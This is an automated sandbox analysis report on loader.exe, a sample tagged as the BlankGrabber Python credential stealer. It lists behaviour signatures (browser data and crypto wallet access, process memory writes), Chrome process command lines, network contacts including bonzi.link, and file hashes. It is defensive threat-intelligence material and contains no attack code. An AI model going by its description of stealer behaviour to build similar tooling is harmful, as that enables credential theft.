Malware Analysis Report

2024-10-16 07:08

Sample ID 240531-w3g2gshe59
Target loader.exe
SHA256 8a38bb293557b9ee3ba0c376d076acc70f70653277af8b3e526b248fc2977c58
Tags
upx execution spyware stealer blankgrabber
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8a38bb293557b9ee3ba0c376d076acc70f70653277af8b3e526b248fc2977c58

Threat Level: Known bad

The file loader.exe was found to be: Known bad.

Malicious Activity Summary

upx execution spyware stealer blankgrabber

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Command and Scripting Interpreter: PowerShell

UPX packed file

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

ACProtect 1.3x - 1.4x DLL software

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Enumerates physical storage devices

Enumerates processes with tasklist

Gathers system information

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Detects videocard installed

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 18:26

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 18:26

Reported

2024-05-31 18:29

Platform

win7-20240221-en

Max time kernel

121s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

Signatures

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 2380 wrote to memory of 2392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 2652 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6a99758,0x7fef6a99768,0x7fef6a99778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1188 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1636 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2252 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2268 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1412 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3188 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3192 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3444 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3600 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3796 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3644 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2740 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3840 --field-trial-handle=1400,i,359823607271191222,16514327417049002472,131072 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.187.196:443 www.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.187.246:443 i.ytimg.com tcp
GB 142.250.187.246:443 i.ytimg.com tcp
GB 142.250.187.246:443 i.ytimg.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.187.234:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.246:443 i.ytimg.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
US 8.8.8.8:53 encrypted-tbn3.gstatic.com udp
US 8.8.8.8:53 id.google.com udp
BG 172.217.17.99:443 id.google.com tcp
GB 142.250.178.14:443 encrypted-tbn3.gstatic.com udp
US 8.8.8.8:53 img.youtube.com udp
US 8.8.8.8:53 bonzi.link udp
FR 151.106.4.82:443 bonzi.link tcp
FR 151.106.4.82:443 bonzi.link tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI22482\python311.dll

MD5 711da56eb35a88095f2baad0e821aa24
SHA1 2755f0d62c54642e936b63974fecc48a971e02e8
